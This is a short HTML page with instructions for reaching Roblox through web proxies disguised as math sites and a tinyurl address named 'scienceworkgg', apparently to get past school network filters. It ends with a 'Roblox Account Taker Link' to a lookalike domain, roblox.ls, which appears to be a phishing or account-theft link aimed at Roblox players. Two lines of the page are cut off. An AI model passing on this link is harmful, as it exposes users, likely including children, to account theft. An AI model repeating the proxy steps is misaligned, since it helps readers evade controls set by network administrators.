<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Roblox</title>
    <style>
        body {
            background-color: #121212;
            color: white;
            font-family: Arial, sans-serif;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            text-align: center;
            padding-top: 30px;
        }

        h1 {
            font-size: 20px;
        }

        a {
            color: blue;
            font-weight: bold;
            text-decoration: none;
            background-color: yellow;
            padding: 2px 5px;
            border-radius: 3px;
        }

        a:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body>
    <h1>HOW TO GO ON ROBLOX ON ALL PROXY SERVERS</h1>
    <p>• Step 1: Open this link <a href="https://mathpunch.github.io" target="_blank">Click Me</a> and scroll down a little to find the proxy section and open one of the servers. <br><strong>*IF THE[...]
    <p>• Step 2: Go to the search bar on the proxy and type: <strong>tinyurl.com/scienceworkgg</strong> then press enter and you're done. Enjoy playing Roblox!</p>
    <p>• And if the <strong>mathpunch</strong> website is banned, then you can go to this website: <a href="https://extramath.github.io" target="_blank">Backup Link</a>. <br>If all of those websites[...]
    
    <p>Roblox Account Taker Link 1: <a href="https://roblox.ls/users/2363281622/profile" target="_blank">Click Me</a></p>
</body>
</html>
